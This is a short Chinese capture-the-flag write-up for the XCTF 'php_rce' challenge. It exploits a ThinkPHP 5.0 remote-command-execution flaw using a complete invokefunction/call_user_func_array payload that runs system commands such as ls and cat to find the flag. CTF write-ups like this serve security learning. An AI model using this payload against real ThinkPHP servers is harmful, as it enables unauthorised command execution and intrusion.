攻防世界 php_rce 解题思路

进入页面

攻防世界 php_rce 解题思路

发现是一个ThinkPHP的框架而且正好是v5.0版本。这个版本存在远程命令执行的漏洞,程序未对控制器进行过滤,导致攻击者可以通过\符号调用任意类。具体漏洞原理分析挂上链接https://www.cnblogs.com/backlion/p/10106676.html

这只使用payload  /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls来列出当前目录。

攻防世界 php_rce 解题思路

没有发现flag,这时候可以想想以前做题的思路,一般flag都是放在根目录下,可以看到这不是根目录,所以我们可以用../返回上一级目录。

攻防世界 php_rce 解题思路

还是没有继续上一级

攻防世界 php_rce 解题思路

没有,继续上一级

攻防世界 php_rce 解题思路

在连续三次上一级下,我们发现了flag,现在我们可以用cat命令读取flag

攻防世界 php_rce 解题思路

发现flag!